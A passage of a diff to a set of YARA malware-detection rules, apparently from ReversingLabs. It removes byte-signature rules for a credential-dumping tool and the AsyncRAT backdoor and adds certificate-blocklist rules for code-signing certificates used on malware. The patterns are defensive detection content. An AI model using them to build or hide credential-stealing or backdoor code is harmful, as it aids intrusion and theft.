FF FF FF 75 ?? 81 7D DC EF BE AD DE 75 ?? 81 - 7D E8 49 6E 73 74 75 ?? 81 7D E4 73 6F 66 74 75 ?? 81 7D E0 4E 75 6C 6C 75 ?? 09 45 - 08 8B 45 08 8B 0D ?? ?? ?? ?? 83 E0 02 09 05 ?? ?? ?? ?? 8B 45 F0 3B C6 89 0D ?? ?? - ?? ?? 0F 8F ?? ?? ?? ?? F6 45 08 08 75 ?? F6 45 08 04 75 - } - $NSIS_ErrorPart = { - 81 EC ?? ?? ?? ?? 53 55 56 33 DB 57 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 33 F6 C6 44 - 24 ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A - ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 53 8D 44 24 ?? 68 ?? ?? ?? ?? 50 53 - 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 15 - ?? ?? ?? ?? BF ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 80 3D ?? ?? ?? - ?? ?? A3 ?? ?? ?? ?? 8B C7 75 - } - $UPX_Decompression = { - 8A 06 46 88 07 47 01 DB 75 ?? 8B 1E 83 EE ?? 11 DB 72 ?? B8 ?? ?? ?? ?? 01 DB 75 ?? - 8B 1E 83 EE ?? 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE ?? 11 DB 72 ?? 48 01 DB 75 - } - $UPX_Encrypting = { - 31 C0 8A 07 30 D8 04 ?? 2C ?? 88 07 47 39 CF 75 - } - $dumping_functionv2014 = { - 55 8B EC 83 EC ?? 56 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 - ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? - 89 45 ?? 85 C0 74 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 74 ?? 8B 45 ?? - 53 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? - 56 6A ?? 6A ?? 8B D8 6A ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 57 6A ?? 6A ?? 6A - ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 51 8B F8 52 57 E8 ?? ?? ?? ?? 83 C4 - ?? 57 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 53 FF D6 5F 5B 5E 8B E5 5D C3 - } - $dumping_functionMidVersion = { - 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ?? ?? ?? 33 - DB BE ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 45 ?? 89 75 ?? 89 5D ?? 88 5D ?? FF 15 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 8B CF 8D 41 ?? 8A 11 41 3A - D3 75 ?? 2B C8 51 57 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? - 83 EC ?? 8B CC 89 65 ?? 6A ?? 89 71 ?? 89 59 ?? 68 ?? ?? ?? ?? 88 59 ?? E8 ?? ?? ?? - ?? 83 EC ?? 8B CC 89 65 ?? 6A ?? 53 8D 55 ?? 89 71 ?? 89 59 ?? 52 88 59 ?? E8 ?? ?? - ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B CC 89 65 ?? 6A ?? 89 71 ?? 89 59 ?? 68 ?? ?? - ?? ?? 88 59 ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 89 65 ?? 6A ?? 53 8D 45 ?? 89 71 ?? 89 - 59 ?? 50 88 59 ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B CC 89 65 ?? 6A ?? - 89 71 ?? 89 59 ?? 68 ?? ?? ?? ?? 88 59 ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 89 65 ?? 6A - ?? 53 8D 55 ?? 89 71 ?? 89 59 ?? 52 88 59 ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 - C4 ?? 8B C4 89 65 ?? 68 ?? ?? ?? ?? 8D 4D ?? 51 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? - ?? ?? 8B 7D ?? BE ?? ?? ?? ?? 83 C4 ?? 39 75 ?? 73 ?? 8D 7D ?? 68 ?? ?? ?? ?? 8D 55 - ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B 40 ?? EB ?? 83 C0 ?? 8B - 4D ?? 57 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 75 ?? 72 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 - C4 ?? 39 75 ?? 72 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 5E 33 CD 33 C0 - 5B E8 ?? ?? ?? ?? 8B E5 5D C2 - } - $dumping_functionE = { - 52 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 5? FF 15 ?? ?? ?? ?? - 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 6A ?? FF 15 ?? - ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? - ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 77 ?? 83 BD ?? ?? ?? ?? ?? 75 ?? - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? - ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? - ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 - 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF - 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 51 8B CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 - } - $dumping_functionP = { - 50 57 56 FF 15 ?? ?? ?? ?? 8B F8 57 56 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 57 56 - 89 45 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BF - ?? ?? ?? ?? 57 56 68 ?? ?? ?? ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 6A - ?? 56 56 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 56 8B D8 8D 45 ?? 50 FF 75 ?? 89 75 ?? - FF 75 ?? 53 FF 15 ?? ?? ?? ?? 53 FF 15 - } - $dumping_functionB = { - 52 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? - 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 - 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 - 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D BD ?? - ?? ?? ?? F3 A5 A4 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? - ?? ?? ?? 89 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 A4 - 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 95 - ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? - ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 51 8B CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 89 85 ?? ?? ?? ?? E8 - } - $dumping_function111 = { - 68 ?? ?? ?? ?? 8D 55 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 39 58 ?? 72 ?? 8B 40 ?? EB - ?? 83 C0 ?? 50 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 39 5D ?? 72 ?? 8B 55 ?? 52 E8 ?? ?? ?? - ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 E8 - } - $dumping_function2 = { - 55 8B EC 51 53 8B 5D ?? 56 68 ?? ?? ?? ?? 8D 45 ?? 53 50 33 F6 E8 ?? ?? ?? ?? 8B 4D - ?? 68 ?? ?? ?? ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? - 83 F8 ?? 74 ?? 57 8B 7D ?? 0F BE 14 3E 8B 4D ?? 51 33 D0 52 E8 ?? ?? ?? ?? 8B C7 83 - C4 ?? 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 2B C2 8D 4E ?? 8B D1 2B D0 - 8B 45 ?? F7 DA 1B D2 23 D1 50 8B F2 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 5F 8B 4D - ?? 51 E8 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 5E 5B 8B - E5 5D C2 - } - $lib_loader = { - 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 A3 ?? ?? - ?? ?? FF D6 33 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 - } - $exception1 = { - B8 ?? ?? ?? ?? 50 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 33 C0 89 08 - } - $exception2 = { - 55 53 51 57 56 52 8D 98 ?? ?? ?? ?? 8B 53 ?? 52 8B E8 6A ?? 68 ?? ?? ?? ?? FF 73 ?? - 6A ?? 8B 4B ?? 03 CA 8B 01 FF D0 - } - $exceptionallock = { - B8 ?? ?? ?? ?? 8D 88 ?? ?? ?? ?? 89 41 ?? 8B 54 24 ?? 8B 52 ?? C6 02 ?? 83 C2 ?? - 2B CA 89 4A ?? 33 C0 C3 - } - condition: - uint16(0)==0x5A4D and $payload and ($NSIS_CheckIntegrity or ($UPX_Decompression and $UPX_Encrypting) or $NSIS_ErrorPart or $dumping_functionv2014 or $dumping_functionMidVersion or ($exception1 and $exception2 and $exceptionallock) or $dumping_functionP or $dumping_functionE or $dumping_functionB or $dumping_function111 or $dumping_function2 or $lib_loader) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HELP, d.o.o." and pe.signatures[i].serial=="6a:24:1f:fe:96:a6:34:9d:f6:08:d2:2c:02:94:22:68" and 1605052800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Asyncrat : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_Aa1D84779792B57F91Fe7A4Bde041942 : INFO FILE { meta: - description = "Yara rule that detects AsyncRAT backdoor." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "78ff36e1-1620-50f4-8abd-adcf8b1242da" - date = "2024-05-22" - modified = "2024-05-22" + id = "8ec25296-2e51-53ec-a2f5-a25961079c27" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/backdoor/ByteCode.MSIL.Backdoor.AsyncRAT.yara#L1-L149" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "53a13975cd53b571910f951adc44707c11b86c003eeb7b88dbe701253645ac89" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11842-L11860" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "682af8c799acaca531724c5b3184b855e64ec4531fcc333a485ba2f63331cdae" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Backdoor" - tc_detection_name = "AsyncRAT" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $read_server_data_v1 = { - 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 39 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 16 28 ?? - ?? ?? ?? DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 0A 06 16 3E ?? ?? ?? ?? 28 - ?? ?? ?? ?? 06 6A 58 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 6A 59 28 ?? ?? ?? ?? 28 ?? ?? - ?? ?? 3A ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 6A 28 ?? ?? ?? ?? 28 ?? ?? ?? - ?? 16 6A 3E ?? ?? ?? ?? 16 6A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 28 ?? - ?? ?? ?? 38 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 69 28 ?? ?? ?? - ?? 69 6F ?? ?? ?? ?? 0B 07 16 3D ?? ?? ?? ?? 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 28 ?? - ?? ?? ?? 07 6A 58 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 07 6A 59 28 ?? ?? ?? ?? 28 ?? ?? ?? - ?? 16 6A 3C ?? ?? ?? ?? 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 6A 30 ?? - 14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? - ?? 16 6A 28 ?? ?? ?? ?? 1A 6A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 28 ?? - ?? ?? ?? 38 ?? ?? ?? ?? 1A 6A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 28 ?? - ?? ?? ?? 16 6A 28 ?? ?? ?? ?? 38 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 6A 3C ?? ?? ?? ?? 16 - 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 69 28 ?? - ?? ?? ?? 69 14 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 6F ?? ?? ?? ?? 26 38 ?? ?? - ?? ?? 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 26 16 28 ?? ?? ?? ?? DD - } - $send_v1 = { - 28 ?? ?? ?? ?? 0A 16 0B 06 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DD ?? - ?? ?? ?? 02 8E 69 28 ?? ?? ?? ?? 0C 28 ?? ?? ?? ?? 15 17 6F ?? ?? ?? ?? 26 28 ?? ?? - ?? ?? 08 16 08 8E 69 6F ?? ?? ?? ?? 02 8E 69 20 ?? ?? ?? ?? 3E ?? ?? ?? ?? 02 73 ?? - ?? ?? ?? 0D 16 13 ?? 09 16 6A 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 38 - ?? ?? ?? ?? 28 ?? ?? ?? ?? 15 17 6F ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 11 ?? 16 11 ?? 6F - ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 25 - 13 ?? 16 30 ?? DD ?? ?? ?? ?? 09 39 ?? ?? ?? ?? 09 6F ?? ?? ?? ?? DC 28 ?? ?? ?? ?? - 15 17 6F ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? - 6F ?? ?? ?? ?? DD ?? ?? ?? ?? 26 16 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 07 39 ?? ?? ?? ?? - 06 28 ?? ?? ?? ?? DC - } - $read_packet_v1_p1 = { - 73 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 02 74 ?? ?? ?? - ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B - 07 28 ?? ?? ?? ?? 0C 08 20 4F 01 89 64 42 ?? ?? ?? ?? 08 20 7A 39 BA 13 42 ?? ?? ?? - ?? 08 20 D4 CA CD 0C 3B ?? ?? ?? ?? 08 20 7A 39 BA 13 3B ?? ?? ?? ?? 38 ?? ?? ?? ?? - 08 20 2B C2 32 1B 3B ?? ?? ?? ?? 08 20 E2 A2 F4 57 3B ?? ?? ?? ?? 08 20 4F 01 89 64 - 3B ?? ?? ?? ?? 38 ?? ?? ?? ?? 08 20 5A 15 79 D9 42 ?? ?? ?? ?? 08 20 B7 16 DB 7A 3B - ?? ?? ?? ?? 08 20 39 20 3F B2 3B ?? ?? ?? ?? 08 20 5A 15 79 D9 3B ?? ?? ?? ?? 38 ?? - ?? ?? ?? 08 20 1E CA D2 DC 3B ?? ?? ?? ?? 08 20 45 FD B6 E0 3B ?? ?? ?? ?? 08 20 D0 - 5E 9B FA 3B ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? - ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 - 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? - ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? - ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 - 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? - ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? - ?? 38 ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 07 - } - $read_packet_v1_p2 = { - 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 73 ?? - ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? - ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6A 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? - 16 28 ?? ?? ?? ?? 38 ?? ?? ?? ?? 00 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? - 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 7E ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 6F ?? - ?? ?? ?? 73 ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? - ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? - 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 38 ?? ?? ?? ?? 06 7B ?? - ?? ?? ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ?? - 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72 - ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 28 ?? ?? - ?? ?? 6F ?? ?? ?? ?? 0D 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? - ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F - ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 11 ?? - 6F ?? ?? ?? ?? 26 12 ?? 28 ?? ?? ?? ?? 2D ?? DD ?? ?? ?? ?? 12 ?? (FE | 16) ?? ?? ?? - ?? ?? 6F ?? ?? ?? ?? DC 73 ?? ?? ?? ?? 26 06 (FE | 06) ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? - 73 ?? ?? ?? ?? 25 16 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 38 ?? ?? ?? ?? - 7E ?? ?? ?? ?? 25 3A ?? ?? ?? ?? 26 7E ?? ?? ?? ?? (FE | 06) ?? ?? ?? ?? ?? 73 - } - $send_v2 = { - 7E ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 16 13 ?? 11 ?? 12 ?? 28 ?? ?? ?? ?? 7E ?? - ?? ?? ?? 39 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 8E - B7 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 06 08 16 08 8E B7 - 6F ?? ?? ?? ?? 06 07 16 07 8E B7 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 15 17 6F ?? ?? ?? ?? - 26 7E ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 16 06 6F ?? ?? ?? ?? B7 16 14 (FE | 06) ?? ?? ?? - ?? ?? 73 ?? ?? ?? ?? 14 6F ?? ?? ?? ?? 26 DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC DE ?? - 25 28 ?? ?? ?? ?? 0D 16 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? DE ?? 11 ?? 2C ?? 11 ?? - 28 ?? ?? ?? ?? DC - } - $open_url_v2 = { - 03 39 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 20 00 0C 00 00 28 ?? ?? ?? ?? 20 0F 27 00 00 28 - ?? ?? ?? ?? DE ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 02 28 ?? ?? ?? ?? 74 ?? ?? ?? - ?? 0A 06 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 7E ?? ?? ?? ?? 8E B7 6F ?? ?? ?? ?? 9A 6F ?? - ?? ?? ?? 06 17 6F ?? ?? ?? ?? 06 20 10 27 00 00 6F ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F - ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 0B DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC - 2B ?? 02 28 ?? ?? ?? ?? 26 - } - $monitoring_v2 = { - 73 ?? ?? ?? ?? 0C 02 72 ?? ?? ?? ?? 15 16 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? - 11 ?? 9A 0B 08 07 14 72 ?? ?? ?? ?? 16 8D ?? ?? ?? ?? 14 14 14 28 ?? ?? ?? ?? 28 ?? - ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 17 D6 13 ?? 11 ?? 11 ?? 8E B7 32 ?? 1F ?? 0A 38 ?? ?? - ?? ?? 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 0D 09 6F ?? ?? ?? ?? 28 ?? - ?? ?? ?? 2C ?? 2B ?? 08 09 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 (FE | 07) ?? ?? ?? ?? ?? - 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 06 1F ?? 31 ?? 16 0A 72 ?? ?? ?? ?? 09 6F ?? ?? - ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 17 D6 13 ?? - 11 ?? 11 ?? 8E B7 32 ?? 06 17 D6 0A 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 3A - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AXIUM NORTHWESTERN HYDRO INC." and (pe.signatures[i].serial=="00:aa:1d:84:77:97:92:b5:7f:91:fe:7a:4b:de:04:19:42" or pe.signatures[i].serial=="aa:1d:84:77:97:92:b5:7f:91:fe:7a:4b:de:04:19:42") and 1639872000<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_3C98B6872Fbb1F4Ae37A4Caa749D24C2 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "f4cc9c94-eb96-5380-9e12-cab5ec010ab8" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11862-L11878" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c534ad306f85e12eca2336e998120deb4ba8d0d63b8331986ec7fe4ac69ba65a" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ((($read_server_data_v1) and ($send_v1) and ( all of ($read_packet_v1_p*))) or (($send_v2) and ($open_url_v2) and ($monitoring_v2))) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO SMART" and 